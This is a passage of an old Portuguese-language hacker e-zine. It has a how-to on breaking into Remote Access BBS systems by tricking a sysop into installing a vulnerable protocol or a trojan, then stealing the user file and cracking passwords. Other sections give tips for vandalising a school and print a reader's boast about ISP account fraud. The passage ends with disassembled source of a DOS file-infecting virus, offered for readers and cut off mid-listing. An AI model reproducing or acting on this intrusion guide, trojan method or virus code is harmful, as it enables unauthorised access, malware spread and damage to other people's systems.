 Ei galera, desculpem por esse topico, nos sabemos que tudo isso foi tirado
 de um texto antigo feito por  Daniel Ribeiro, e que esse texto e' meio
 merda, mas fazer o que ? Agente tava com pressa de terminar o zine, tava
 quase no fim do mes e nao tinha quase nada pronto !!!
                                       
               "ARQUIVO RETIRADO DA ZONA HACKER DA ECO-NET BBS"
  (PEDIMOS QUE NAO RETIRE O COMENTARIO ACIMA PARA MANTER A INTEGRIDADE DO
  TRABALHO EXERCIDO E EM PROL AO RESPEITO AO TRABALHO ALHEIO,   OBRIDADO)


 1 - Introducao.

     A pergunta que todos nos fazemos um ao outro, como se hackeia um BBS??
     e quais as possibilidades de obter sucesso?, pois e', por essa questao
     resolvi citar algumas de minha manhas que muitas vezes funcinaram, nes
     te caso, citarei a forma mais facil e simples de se hackear um BBS em
     sistema REMOTE ACCESS.




 2 - Como hackear o BBS?

     Bom, a principio, voce deve encontrar um BBS em RA, que estaja iniciando
     e nao conheca as manhas necessarias para garantir a seguranca contra ha-
     ckers e cyberpunks, desta forma, voce deve persuadir ao SysOP ( que  nao
     conhece nada ainda) a disponibilizar o protocolo PUMA/Mpt (protocolo que
     esta disponivel no Eco-Net BBS), desta forma, quando o SysOp ja  estiver
     instalado o Protocolo, todo feliz e contente, voce conecta ao BBS dele e
     quando ele estiver dormindo ( claro!) atravez do TERMiNATE x.xx e pres-
     siona "SCROLL Lock" (Door Way Mode) e comeca tranquilamente a transferir
     um arquivo qualquer, no meio da transferencia, vem a surpreza! pressione
     ALT-A (ou CTRl-A nao me lembro ao certo) e ele simplesmente cair  para o
     DOS do Cara em Remote Mode! tendo acesso total a todos os dados do infe-
     iz! Podendo roubar o USERS.BBS e tranquilamente ter acesso de  todos  os
     usuarios desejados, mais ai, voce me pergunta: "O RA tem uma protecao  e
     nao permite que o SYSOP visualize as senhas dos usuarios,desta forma nao
     tem jeito de usar a senha de outros usuarios registrados, como faria en-
     to??? e eu, grande conhecedor no assunto (HEHE) respondo: Nao Conferen-
     cia HACKERS (N 10) esta disponivel um arquivo chamado: "RAPWD.ARJ"  que
     acha a senha dos usuarios no RA!!! e entao, podera entrar com o nome  do
     sysop, dos usuarios registrados (todos) e muito mais! alem de, se quiser
     danificar varios arquivos do BBS! mas, pense bem, o Coitado do Sysop de-
     morou muito tempo, e gastou muita forca de vontade para construir um BBS
     para que em poucos segundos, voce destrua-a, portanto,  seria uma enorme
     sacanagem formatar o HD do cara, faca qualquer coisa, roube arquivos,de-
     ixe mensagens, tire sarro, mas nao Formate nada! posso lhe garantir  que
     vai ser muito mais divertido...


 3 - E se o Sysop for uma MULA e nao souber e/ou quiser instalar o PUMA/Mpt??

     Caso o sysop nao queira de forma alguma instalar o PUMA/Mpt ou nao tenha
     neuronios suficientes para conseguir configura-lo, e simples, de um help
     para ele! construa um Trojan (bem simples)  com uma tela de apresentacao
     bem convincente, e faca um UPLOAD, ao iniciar a descricao do arquivo,vo-
     ce a faz com uma grande inspiracao, deixando dessa forma o "Pobre" Sysop
     curioso, louco para "rodar" o upload feito por voce, logo que roda-lo  o
     Trojan (voce deve saber que o trojan ira copiar o PUMA para o  diretorio
     do Remote AcCess, e substituir o arquivo de protocolos por  um  identico
     e incluido do PUMA)  e o trojan executara a funcao em parentezes,  assim
     voce estara dando um "Empurraozinho para o sysop, desta forma o Puma/Mpt
     sera instalado a forca no RA! e podera iniciar o processo do citado a uma
     pagina acima!!!!.



 4 - E se apos tudo isso, o processo nao funcionar????

     Caso voce, ao tentar executar a instrucao nao obtenha resposta ao Comando
     ALT-A, tem ainda uma segunda e ultima chance: IMPLORAR para o  Sysop  lhe
     dar um nivel de SYSOP para matar suas lumbrigaS!!!! :)))))


 -=[+]================================================================[+]=-


                       -=[#]=-  9.Anarchisty  -=[#]=-
                               ==============

Agora voltamos novamente ao nosso pedaco de Anarchisty !!!
Com algo mais pra galera zua por ai !!! Hmmmm... sei la, nao tenho mais o
que ficar falando, entao vo para de fazer discurso e comeca logo...

-=._[ Se voce quiser avacalhar com sua escola ]_.=-
                                            
+=+ Se as cordinhas da Patente da sua escola ainda estiverem inteira, 
queime-as com um isqueiro ou coisa parecida.

+=+ Se nao tiver um furo na caixa da patente faca um. (e claro que se for de 
plastico.)

+=+ Pege e roube um gis do professor antes do recreio, e na hora do recreio 
pinte no quadro atras da classe do professor um chifre !!!!
(mas voce tera que ver mais ou menos fica melhor) com a altura e coisa do 
professo. Quem for esperto consegue direitinho. Fica muito animal.

+=+ quando todo mundo sair da sala na hora do recreio, pege e tire o pininho 
do trinco da porta, troque as partes do trinco, coloque a que nao tem aquele 
cabinho de ferro para dentro e a outra para fora. 
ai quando o professor ou aquele aluno muito mane for entrar fica com o 
trinco na mao e se perde um tempao de aula.

+=+ Sua escola tem cortinas ?? Corteas ou grude um chiclesao nelas.

+=+ Coloque aquelas colas com porpurinha entre o espacinho no meio do trinco 
da porta quando bater para trocar de professor, e feche a sala. O professor 
mete o maosao la e fica todo melecado.

Isso ai mes que vem tem mais dicas de anarchy !

;[ Materia por    Billie Joe  ]; 

 -=[+]================================================================[+]=-
                  -=[#]=-  10.UNDA UNDA UNDA  -=[#]=-
                          ===================
Bom, voce deve estar lhe perguntando que raios de unda unda unda e' esse ?
E' o seguinte, foi a primeira coisa que me veio a cabeca !
Agente nao tinha mais o que escrever e encheu linguica com esse topico, pra
lhes dizer que ainda estaremos recebendo os mails da galera, em caso de
duvidas ou alguma coisa nos escreva !


Atenciosamente : [RiCk> CraZy


 -=[+]================================================================[+]=-

                   -=[#]=-  11.Carta dos Leitores  -=[#]=-
                           =======================

Bom pessoal, primeiro voces devem saber que nosso E-Mail mudou !!!
Se voces quiserem mandar Mails pra gente, escrevam apra:
.________________________________________________________________________.
|           rickcz@mandic.com.br "mail para [RiCk> CraZy"                |
|           joker@mandic.com.br "mail para Alevirus"                     |
--------------------------------------------------------------------------

Se voce quiser falar em privativo, mande em PGP :


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzNVCRUAAAEEAMXqHcR/2X06CBjnO7KSCMQngcZJR+9W1zIsXQKaCURgRN+0
CRhgP3e0lgDEAIRExnKUcNgwE+ntrX0CBSA+GdAuXc+zasPa9JUaxHFwxHCrYadb
ec8p+GOtsoSKH8dc3nT28vDJdLLUa79Zfw6mP/hRCuc1XYheWxKqrHr3uBoVAAUR
tCNbUmlDaz4gQ3JhWnkgPHJpY2tjekBtYW5kaWMuY29tLmJyPokAlQMFEDNVCRUS
qqx697gaFQEBc2oEAKAFk8QIWEEJ/e6u9SFvUReq0m+ZSgb9JVcUV8BfdGywkLbo
psPt8Nf6Ezm39njR+C45arzrgVKwDNS682CkAEKXcOOpclf1BOkWo23j56RnE/Nj
UncxCoHuRdE+clnAhHH/fb7FiYya7mAF5Ylp44K/tg6RPpK4pwY/6TkOWF9w
=b6nK
-----END PGP PUBLIC KEY BLOCK-----


E tb devem saber que recebemos muito mails, mas por um pequeno incidente
perdemos mais da metade.... entao, os que sobraram agente vai por aqui !!!

" `Ah... so colocaremos os mails com criticas e etc... nao colocaremos os
que o pessoal amndou pedindo o zine ! E tb, no's decidimos nao mostrar o
endereco dos remetentes"

...

Subject: Re: Zine Hacker

>HeHe ! Ta  bom, entao ai vai ela...depois me escreve dizendo se acho bom
>mesmo ou so' papo !! ;)
>
>[RiCk> CraZy
>
Vc me convenceu... eheheh :-)) A informacao e das boas... Cool.
Vcs sao de SP?

Resposta: Somos de Sampa sim !! ;)

.---------------------------------------------------------------------------.

Subject: Quebra de Sigilo

         Peguei a nove zine de vcs na Mandic e achei muito legal. A Quebra
de Sigilo e' muito melhor q a Barata Ele'trica ou qualquer outra q eu ja vi
por ai. Espero q a revista de certo e va para frente. Sugiro q mais pra
frente, se possivel, vcs colocarem uma pgina na Internet para publicar a
zine. Qualquer coisa q eu puder fazer pra ajudar e' so' me mandar um e-mail.
Coloquei  a revista numa BBS ai q eu conheco e uns caras q conheco pegaram
e tbm gostaram.
Ate' a proxima!  >:-)

e-mail:   marceldp@mandic.com.br

Resposta : Valeu ! ;) ! Quanto a vc ajudar, se quiser pode ajudar a
destribuir a zine !!

.---------------------------------------------------------------------------.

Subject: Zine

Muito boa a revista on-line que vcs fizeram parabens
PS: Por favor mande as proximas edicoes para mim via e-mail!

IH,COMO VC JA LEU ACIMA, JA ERA BROTHER !
.---------------------------------------------------------------------------.

Subject: Quebra de Sigilo

Parabe'ns pela Zine ! E' a melhor que ja vi !!! A Quebra de Sigilo e a AXUR
sao os melhores zines hackers do Brasil !
Tomara que continuem assim !!!!

Resposta : Tank's pelos elogios... !!!

.---------------------------------------------------------------------------.

Subject: Zine Eletronico

Cara, ta simplesmente D++++ !!!!
So' falata agora um site na internet contendo os zines !!!!

Resposta : Agente tava com um, ficamos come le por 1 mes, e tiramos pq
paramos de afze ro zine !

.---------------------------------------------------------------------------.

Subject: Quebra de Sigilo

Isso ai ! Chega de zines chatos, que nos tratam como criancas...
Quebra de Sigilo chegou pra arrasar !!!!
Valeu , continuem assim !

Resposta : agora nao da mais!

.--------------------------------------------------------------------------.

Subject: zine

Ta bem legal a fanzine de voces. so' fala algo mais sobre Phreaker e tal,
mas mesmo assim ta legal !!!
Tchau

Resposta : Hehehe, ok, entao colocaremos mais algo sobre Phreaker !!! =)

.--------------------------------------------------------------------------.

Subject: Quebra de Sigilo

COOOOOOOOOOOOOOOOOOOLLL ! Acabei de ler a zine que uns amigos me mandaram !!!
Ta D+ Eu e meus amigos adoramos !! Valeu Galera !

Resposta : Obrigado pelos elogios !!!

.---------------------------------------------------------------------------.


Subject: Hello Q.Z!!

Fala Q.z,,

        Eu sou Kemp 97 [Br]... Clan Bone Rovers Games....

        Nao sou um KEVIN da vida... TAMBEM NAO SOU LAMMER..E NEM UM SUPER
SABICHAO (HACKER)...

        Adorei a ZINE de vc`s.....UhUh...DEMAIS...
 
        Mais, ta na cara que esse e-mail player@mandic.com.br e
renatoma@mandic.com.br sao contas POP

        do MANDIC...

        AI....ESSAS contas sao FANTASMAS nao, sao FAKES, NAO ESTOU ACUSANDO
NINGUEM pois eu faco o mesmo
        
        no MANDIC so que com o 0800...

        Acho que tenho bastante expriencia no MANDIC, em fraudes, mas e vc`s ??

        VC`s tem alguma coisa a passar para mim ?????

        Se forem fazer alguma materia sobre isso posso ajudar...Pois tenho
experiencia nesta area....

        PELA SEGUNDA VEZ NAO SOU UM HACKER MESMO....

        TAlveZ um pouco....

        
        GOSTARIA DE TROCAR INFORMACOES COM VC`S SOBRE A RESPEITO DE
CADASTROS FAKES NO MANDIC !!!!

        Me contem alguma coisa ??? Ja foram pegos ?? Ainda fazem muito isso
(raro ou nao) ???

        E sobre o grande CMASTER (4.0) o que acham ??

        Sobre o Cmaster 4.0 acho o melhor programa para fraudes.... SE VC
SOUBER USAR O BANK PREFIX....

        E muito se vc souber usar...mas se nao souber inutil ta quanto um
programa qualquer !!!!

                                     _____@_____.____.__

                                               KEMP 97 [Br]

                                                  Diretor do Clan Bone
Rovers Games

                                                     Aniquilador de QUAKE
(pelo menos antes era..:-))


Resposta : Ja foi respondido pra voce por mail cara ! hehehe! ;)

 -=[+]================================================================[+]=-

                   -=[#]=-  12.CANJA DA QUEBRA  -=[#]=-
                           ====================
Nesta canja colocaremos disponivel fontes de alguns virus famosos !
por favor, nao modifiquem os virus !
Valeu ! ;)

.............................................................................


PAGE  59,132

;
;									 
;				VIR_					 
;									 
;	 Created:  ??-??-??						 
;	 Version:							 
;	 Code type: zero start						 
;	 Passes:    9	       Analysis Options on: A			 
;									 
;	 Disassembled by: Sir John -- 11.MAR.1991			 
;									 
;

PSP_0A		equ	0Ah			; (0000:000A=0)
MCB_0000	equ	0			; (7DBC:0000=E9)
MCB_0001	equ	1			; (7DBC:0001=275h)
MCB_0003	equ	3			; (7DBC:0003=1503h)
all_len 	equ	1600h
jmp_len 	equ	3
sav_file	equ	data_23 - virus_entry + jmp_len

seg_a		segment byte public
		assume	cs:seg_a, ds:seg_a

		org	0

		db	 00h

		jmp	vir_1
data_23 	dw	20CDh		; old file
data_24 	dw	0		; (first 6 bytes)
data_25 	dw	0		; - check sum
		db	0,0,0,0,0,0,0,0
data_27 	dw	0		; + 0eh = original SS:
data_28 	dw	0		; + 10h = original SP
		dw	0
data_29 	dd	0		; + 14h = .EXE file entry point
		db	0,0,0,0
data_31 	db	0		; flag : 1-EXE, 0-COM
data_32 	db	0FEh
		db	 3Ah
debug:		push	bp		;address is 0023
		mov	bp,sp
		push	ax
		cmp	[bp+4],0C000h
		jae	loc_1_1 	; segment > C000
		mov	ax,cs:data_68
		cmp	[bp+4],ax
		jna	loc_1_1
loc_1:		pop	ax
		pop	bp
		iret				; Interrupt return
loc_1_1:	cmp	byte ptr cs:data_73,1	; (CS:1250=0)
		je	loc_3			; Jump if equal
		mov	ax,[bp+4]
		mov	word ptr cs:old_INT+2,ax  ; (CS:122F=70h)
		mov	ax,[bp+2]
		mov	word ptr cs:old_INT,ax	  ; (CS:122D=0)
		jc	loc_2			; Jump if carry Set
		pop	ax
		pop	bp
		mov	ss,cs:data_92		; (CS:12DD=151Ch)
		mov	sp,cs:data_93		; (CS:12DF=0)
		mov	al,cs:data_97		; (CS:12E5=0)
		out	21h,al			; port 21h, 8259-1 int comands
		jmp	loc_79			; (0D40)
loc_2:
		and	word ptr [bp+6],0FEFFh
		mov	al,cs:data_97		; (CS:12E5=0)
		out	21h,al			; port 21h, 8259-1 int comands
		jmp	short loc_1		; (0037)
loc_3:
		dec	cs:data_74		; (CS:1251=0)
		jnz	loc_1			; Jump if not zero
		and	word ptr [bp+6],0FEFFh
		call	sub_21			; Save REGS in vir's stack
		call	sub_18			; (0DBA)
		lds	dx,cs:old_INT_1 	; (CS:1231=0) Load 32 bit ptr
		mov	al,1
		call	sub_27			; Set INT 01 vector
		call	sub_20			; Restore regs from vir's stack
		jmp	short loc_2		; (0067)


;
;			       SUBROUTINE
;

sub_1		proc	near
		push	ds
		push	si
		xor	si,si			; Zero register
		mov	ds,si
		xor	ah,ah			; Zero register
		mov	si,ax
		shl	si,1			; Shift w/zeros fill
		shl	si,1			; Shift w/zeros fill
		mov	bx,[si]
		mov	es,[si+2]
		pop	si
		pop	ds
		retn
sub_1		endp

vir_1:		mov	cs:data_113,1600h	; (CS:135B=0)
		mov	cs:old_AX,ax		; (CS:12E3=0)
		mov	ah,30h
		int	21h			; DOS Services	ah=function 30h
						;  get DOS version number ax
		mov	cs:dos_ver,al		; (CS:12EE=0)
		mov	cs:old_DS,ds		; (CS:1245=7DBDh)
		mov	ah,52h
		int	21h			; DOS Services	ah=function 52h
						;  get DOS data table ptr es:bx
		mov	ax,es:[bx-2]
		mov	cs:data_68,ax		; (CS:1247=0)
		mov	es,ax
		mov	ax,es:[1]		; (5200:0001=0FFFFh)
		mov	cs:data_69,ax		; (CS:1249=0)
		push	cs
		pop	ds
		mov	al,1
		call	sub_1			; Get INT 01 vector
		mov	word ptr old_INT_1,bx	; (CS:1231=0)
		mov	word ptr old_INT_1+2,es ; (CS:1233=70h)
		mov	al,21h
		call	sub_1			; Get INT 21 vector
		mov	word ptr old_INT,bx	; (CS:122D=0)
		mov	word ptr old_INT+2,es	; (CS:122F=70h)
		mov	byte ptr data_73,0	; (CS:1250=0)
		mov	dx,offset debug
		mov	al,1
		call	sub_27			; Set INT 01 vector
		pushf				; Push flags
		pop	ax
		or	ax,100h
		push	ax
		in	al,21h			; port 21h, 8259-1 int IMR
		mov	data_97,al		; (CS:12E5)
		mov	al,0FFh
		out	21h,al			; port 21h, 8259-1 int comands
		popf				; Pop flags
		mov	ah,52h
		pushf				; Push flags
		call	dword ptr old_INT	; (CS:122D)
		pushf				; Push flags
		pop	ax
		and	ax,0FEFFh
		push	ax
		popf				; Pop flags
		mov	al,data_97		; (CS:12E5=0)
		out	21h,al			; port 21h, 8259-1 int comands
		push	ds
		lds	dx,old_INT_1		; (CS:1231=0) Load 32 bit ptr
		mov	al,1
		call	sub_27			; Set INT 01 vector
		pop	ds
		les	di,old_INT		; (CS:122D=0) Load 32 bit ptr
		mov	word ptr ptr_INT_21,di	 ; (CS:1235=0)
		mov	word ptr ptr_INT_21+2,es ; (CS:1237=70h)
		mov	byte ptr data_70,0EAh	; (CS:124B=0)
		mov	data_71,offset INT_21	; (CS:124C=0) (02CC)
		mov	data_72,cs		; (CS:124E=7DBDh)
		call	sub_18			; (0DBA)
		mov	ax,4B00h
		mov	data_95,ah		; (CS:12E2=0)
		mov	dx,offset data_32	; (CS:0021=0FEh)
		push	word ptr data_31	; (CS:0020=0FE00h)
		int	21h			; DOS Services	ah=function 4Bh
						;  run progm @ds:dx, parm @es:bx
		pop	word ptr data_31	; (CS:0020=0FE00h)
		add	word ptr es:[di-4],9
		nop
		mov	es,old_DS		; (CS:1245)
		mov	ds,old_DS		; (CS:1245)
		sub	word ptr ds:[2],161h	; decrement mem size
		mov	bp,word ptr ds:[2]	; mem size
		mov	dx,ds
		sub	bp,dx
		mov	ah,4Ah
		mov	bx,0FFFFh
		int	21h			; DOS Services	ah=function 4Ah
						;  change mem allocation, bx=siz
		mov	ah,4Ah
		int	21h			; DOS Services	ah=function 4Ah
						;  change mem allocation, bx=siz
		dec	dx
		mov	ds,dx
		cmp	byte ptr ds:[MCB_0000],5Ah ; (7DBC:0000=0E9h) 'Z'
		je	loc_4			; Jump if equal
		dec	cs:data_95		; (CS:12E2=0)
loc_4:
		cmp	byte ptr cs:data_95,0	; (CS:12E2=0)
		je	loc_5			; Jump if equal
		mov	byte ptr ds:[MCB_0000],4Dh ; (7DBC:0000=0E9h) 'M'
loc_5:
		mov	ax,ds:MCB_0003		; (7DBC:0003=1503h)
		mov	bx,ax
		sub	ax,161h
		add	dx,ax
		mov	ds:MCB_0003,ax		; (7DBC:0003=1503h)
		inc	dx
		mov	es,dx
		mov	byte ptr es:MCB_0000,5Ah	; (915F:0000=0) 'Z'
		push	cs:data_69			; (CS:1249=0)
		pop	word ptr es:MCB_0001		; (915F:0001=0)
		mov	word ptr es:MCB_0003,160h	; (915F:0003=0)
		inc	dx
		mov	es,dx
		push	cs
		pop	ds
		mov	cx,all_len/2
		mov	si,all_len-2		; (CS:15FE=0)
		mov	di,si
		std				; Set direction flag
		rep	movsw			; Rep when cx >0 Mov [si] to es:[di]
		cld				; Clear direction
		push	es
		mov	ax,offset loc_1EE
		push	ax
		mov	es,cs:old_DS		; (CS:1245=7DBDh)
		mov	ah,4Ah			; 'J'
		mov	bx,bp
		int	21h			; DOS Services	ah=function 4Ah
						;  change mem allocation, bx=siz
		retf				; Return far - jump to loc_1EE
loc_1EE:	call	sub_18			; (0DBA)
		mov	cs:data_72,cs		; (CS:124E=7DBDh)
		call	sub_18			; (0DBA)
		push	cs
		pop	ds
		mov	byte ptr data_76,14h	; (CS:12A2=0)
		push	cs
		pop	es
		mov	di,offset data_75	; (CS:1252=0)
		mov	cx,14h
		xor	ax,ax			; Zero register
		rep	stosw			; Rep when cx >0 Store ax to es:[di]
		mov	data_103,al		; (CS:12EF=0)
		mov	ax,old_DS		; (CS:1245=7DBDh)
		mov	es,ax
		lds	dx,es:[0Ah]		; from offset 000A in PSP Load 32 bit ptr
		mov	ds,ax
		add	ax,10h
		add	word ptr cs:data_29+2,ax ; (CS:001A=1ED5h)
		cmp	byte ptr cs:data_31,0	 ; (CS:0020=0)
		jne	loc_6			; Jump if not equal
; restore infected .COM file and run it
		sti				; Enable interrupts
		mov	ax,cs:data_23		; (CS:0004=20CDh)
		mov	word ptr ds:[100h],ax	; (CS:0100=0E9Ah)
		mov	ax,cs:data_24		; (CS:0006=340h)
		mov	word ptr ds:[102h],ax	; (CS:0102=589Ch)
		mov	ax,cs:data_25		; (CS:0008=50C6h)
		mov	word ptr ds:[104h],ax	; (CS:0104=0Dh)
		push	cs:old_DS		; (CS:1245=7DBDh)
		mov	ax,100h
		push	ax
		mov	ax,cs:old_AX		; (CS:12E3=0)
		retf				; Return far
loc_6:
; restore infected .EXE file and run it
		add	cs:data_27,ax		; (CS:0012=68Ch)
		mov	ax,cs:old_AX		; (CS:12E3=0)
		mov	ss,cs:data_27		; (CS:0012=68Ch)
		mov	sp,cs:data_28		; (CS:0014) original SP
		sti				; Enable interrupts
		jmp	cs:data_29		; (CS:0018=12Bh)
virus_entry:	cmp	sp,100h
		ja	loc_7			; Jump if above
		xor	sp,sp			; Zero register
loc_7:
		mov	bp,ax
		call	sub_2			; (0275)
sub_2:		pop	cx
		sub	cx,offset sub_2
		mov	ax,cs
		mov	bx,10h
		mul	bx			; dx:ax = ax * 10
		add	ax,cx			; cx = virus begin address
		adc	dx,0
		div	bx			; ax,dx rem=dx:ax/10
		push	ax			; ax = new segment
		mov	ax,offset vir_1
		push	ax
		mov	ax,bp
		retf				; Return far - jump to vir_1

table		db	 30h
		dw	offset _21_30
		db	 23h
		dw	offset _21_23
		db	 37h
		dw	offset _21_37
		db	 4bh
		dw	offset _21_4B
		db	 3ch
		dw	offset _21_3C
		db	 3dh
		dw	offset _21_3D
		db	 3Eh
		dw	offset _21_3E
		db	 0Fh
		dw	offset _21_0F
		db	 14h
		dw	offset _21_14
		db	 21h
		dw	offset _21_21
		db	 27h
		dw	offset _21_27
		db	 11h
		dw	offset _21_11_12
		db	 12h
		dw	offset _21_11_12
		db	 4Eh
		dw	offset _21_4E_4F
		db	 4Fh
		dw	offset _21_4E_4F
		db	 3Fh
		dw	offset _21_3F
		db	 40h
		dw	offset _21_40
		db	 42h
		dw	offset _21_42
		db	 57h
		dw	offset _21_57
		db	 48h
		dw	offset _21_48
end_tbl:
INT_21: 	cmp	ax,4b00h
		jnz	loc_8_1
		mov	cs:data_95,al
loc_8_1:	push	bp
		mov	bp,sp
		push	[bp+6]			; flags
		pop	cs:data_85
		pop	bp			;  ???
		push	bp			;  ???
		mov	bp,sp
		call	sub_21			; Save REGS in vir's stack
		call	sub_18			; xchg info in INT 21
		call	sub_15			; BREAK = OFF
		call	sub_20			; Restore regs from vir's stack
		call	sub_17			; Save REGS
		push	bx
		mov	bx,offset table
loc_8:
		cmp	ah,cs:[bx]
		jne	loc_9			; Jump if not equal
		mov	bx,cs:[bx+1]
		xchg	bx,[bp-14h]
		cld				; Clear direction
		retn
loc_9:
		add	bx,3
		cmp	bx,offset end_tbl
		jb	loc_8			; Jump if below
		pop	bx
loc_10:
		call	sub_16			; Restore BREAK state
		in	al,21h			; port 21h, 8259-1 int IMR
		mov	cs:data_97,al		; (CS:12E5=0)
		mov	al,0FFh
		out	21h,al			; port 21h, 8259-1 int comands
		mov	byte ptr cs:data_74,4	; (CS:1251=0)
		mov	byte ptr cs:data_73,1	; (CS:1250=0)
		call	sub_22			; Set INT 01 for debuging
		call	sub_19			; Restore REGS
		push	ax
		mov	ax,cs:data_85		; (CS:12B3=0)
		or	ax,100h
		push	ax
		popf				; Pop flags
		pop	ax
		pop	bp
		jmp	dword ptr cs:ptr_INT_21 ; (CS:1235=0)
loc_11:
		call	sub_21			; Save REGS in vir's stack
		call	sub_16			; (0D9B)
		call	sub_18			; (0DBA)
		call	sub_20			; Restore regs from vir's stack
		pop	bp
		push	bp
		mov	bp,sp
		push	cs:data_85		; (CS:12B3=0)
		pop	word ptr [bp+6]
		pop	bp
		iret				; Interrupt return
_21_11_12:	call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		or	al,al			; Zero ?
		jnz	loc_11			; Jump if not zero
		call	sub_17			; Save REGS
		call	sub_3			; (0581)
		mov	al,0
		cmp	byte ptr [bx],0FFh
		jne	loc_12			; Jump if not equal
		mov	al,[bx+6]
		add	bx,7
loc_12:
		and	cs:data_104,al		; (CS:12F0=0)
		test	byte ptr [bx+1Ah],80h
		jz	loc_13			; Jump if zero
		sub	byte ptr [bx+1Ah],0C8h
		cmp	byte ptr cs:data_104,0	; (CS:12F0=0)
		jne	loc_13			; Jump if not equal
		sub	word ptr [bx+1Dh],1000h
		sbb	word ptr [bx+1Fh],0
loc_13:
		call	sub_19			; Restore REGS
		jmp	short loc_11		; (033F)
_21_0F: 	call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		call	sub_17			; Save REGS
		or	al,al			; Zero ?
		jnz	loc_13			; Jump if not zero
		mov	bx,dx
		test	byte ptr [bx+15h],80h
		jz	loc_13			; Jump if zero
		sub	byte ptr [bx+15h],0C8h
		sub	word ptr [bx+10h],1000h
		sbb	byte ptr [bx+12h],0
		jmp	short loc_13		; (0396)
_21_27: 	jcxz	loc_15			; Jump if cx=0
_21_21: 	mov	bx,dx
		mov	si,[bx+21h]
		or	si,[bx+23h]
		jnz	loc_15			; Jump if not zero
		jmp	short loc_14		; (03D7)
_21_14: 	mov	bx,dx
		mov	ax,[bx+0Ch]
		or	al,[bx+20h]
		jnz	loc_15			; Jump if not zero
loc_14:
		call	sub_7			; (0919)
		jnc	loc_16			; Jump if carry=0
loc_15:
		jmp	loc_10			; (030F)
loc_16:
		call	sub_19			; Restore REGS
		call	sub_17			; Save REGS
		call	sub_24			; INT 21
		mov	[bp-4],ax
		mov	[bp-8],cx
		push	ds
		push	dx
		call	sub_3			; (0581)
		cmp	word ptr [bx+14h],1
		je	loc_17			; Jump if equal
		mov	ax,[bx]
		add	ax,[bx+2]
		add	ax,[bx+4]
		jz	loc_17			; Jump if zero
		add	sp,4
		jmp	short loc_13		; (0396)
loc_17:
		pop	dx
		pop	ds
		mov	si,dx
		push	cs
		pop	es
		mov	di,offset data_86	; (CS:12B5=0)
		mov	cx,25h
		rep	movsb			; Rep when cx >0 Mov [si] to es:[di]
		mov	di,offset data_86	; (CS:12B5=0)
		push	cs
		pop	ds
		mov	ax,[di+10h]
		mov	dx,[di+12h]
		add	ax,100Fh
		adc	dx,0
		and	ax,0FFF0h
		mov	[di+10h],ax
		mov	[di+12h],dx
		sub	ax,0FFCh
		sbb	dx,0
		mov	[di+21h],ax
		mov	[di+23h],dx
		mov	word ptr [di+0Eh],1
		mov	cx,1Ch
		mov	dx,di
		mov	ah,27h			; '''
		call	sub_24			; INT 21
		jmp	loc_13			; (0396)
_21_23: 	push	cs
		pop	es
		mov	si,dx
		mov	di,offset data_86	; (CS:12B5=0)
		mov	cx,25h
		rep	movsb			; Rep when cx >0 Mov [si] to es:[di]
		push	ds
		push	dx
		push	cs
		pop	ds
		mov	dx,offset data_86	; CS:12B5
		mov	ah,0Fh
		call	sub_24			; INT 21
		mov	ah,10h
		call	sub_24			; INT 21
		test	byte ptr data_89,80h	; (CS:12CA=0)
		pop	si
		pop	ds
		jz	loc_20			; Jump if zero
		les	bx,cs:data_88		; (CS:12C5=0) Load 32 bit ptr
		mov	ax,es
		sub	bx,1000h
		sbb	ax,0
		xor	dx,dx			; Zero register
		mov	cx,cs:data_87		; (CS:12C3=0)
		dec	cx
		add	bx,cx
		adc	ax,0
		inc	cx
		div	cx			; ax,dx rem=dx:ax/reg
		mov	[si+23h],ax
		xchg	ax,dx
		xchg	ax,bx
		div	cx			; ax,dx rem=dx:ax/reg
		mov	[si+21h],ax
		jmp	loc_13			; (0396)
_21_4E_4F:	and	cs:data_85,0FFFEh	; (CS:12B3=0)
		call	sub_19			; Restore REGS
		call	sub_24			; INT 21
		call	sub_17			; Save REGS
		jnc	loc_18			; Jump if carry=0
		or	cs:data_85,1		; (CS:12B3=0)
		jmp	loc_13			; (0396)
loc_18:
		call	sub_3			; (0581)
		test	byte ptr [bx+19h],80h
		jnz	loc_19			; Jump if not zero
		jmp	loc_13			; (0396)
loc_19:
		sub	word ptr [bx+1Ah],1000h
		sbb	word ptr [bx+1Ch],0
		sub	byte ptr [bx+19h],0C8h
		jmp	loc_13			; (0396)
_21_3C: 	push	cx
		and	cx,7
		cmp	cx,7
		je	loc_23			; Jump if equal
		pop	cx
		call	sub_13			; (0CC6)
		call	sub_24			; INT 21
		call	sub_14			; (0D6C)
		pushf				; Push flags
		cmp	byte ptr cs:data_90,0	; (CS:12DA=0)
		je	loc_21			; Jump if equal
		popf				; Pop flags
loc_20:
		jmp	loc_10			; (030F)
loc_21:
		popf				; Pop flags
		jc	loc_22			; Jump if carry Set
		mov	bx,ax
		mov	ah,3Eh			; '>'
		call	sub_24			; INT 21
		jmp	short _21_3D		; (0511)
loc_22:
		or	byte ptr cs:data_85,1	; (CS:12B3=0)
		mov	[bp-4],ax
		jmp	loc_13			; (0396)
loc_23:
		pop	cx
		jmp	loc_10			; (030F)
_21_3D:
		call	sub_9			; Get PSP segment
		call	sub_8			; (0925)
		jc	loc_26			; Jump if carry Set
		cmp	byte ptr cs:data_76,0	; (CS:12A2=0)
		je	loc_26			; Jump if equal
		call	sub_10			; (097E)
		cmp	bx,0FFFFh
		je	loc_26			; Jump if equal
		dec	cs:data_76		; (CS:12A2=0)
		push	cs
		pop	es
		mov	di,offset data_75	; (CS:1252=0)
		mov	cx,14h
		xor	ax,ax			; Zero register
		repne	scasw			; Rep zf=0+cx >0 Scan es:[di] for ax
		mov	ax,cs:data_77		; (CS:12A3=0)
		mov	es:[di-2],ax
		mov	es:[di+26h],bx
		mov	[bp-4],bx
loc_25:
		and	byte ptr cs:data_85,0FEh	; (CS:12B3=0)
		jmp	loc_13			; (0396)
loc_26:
		jmp	loc_10			; (030F)
_21_3E: 	push	cs
		pop	es
		call	sub_9			; Get PSP segment
		mov	di,offset data_75	; (CS:1252=0)
		mov	cx,14h
		mov	ax,cs:data_77		; (CS:12A3=0)
loc_27:
		repne	scasw			; Rep zf=0+cx >0 Scan es:[di] for ax
		jnz	loc_28			; Jump if not zero
		cmp	bx,es:[di+26h]
		jne	loc_27			; Jump if not equal
		mov	word ptr es:[di-2],0
		call	sub_4			; (0793) - infect file
		inc	cs:data_76		; (CS:12A2=0)
		jmp	short loc_25		; (0549)
loc_28:
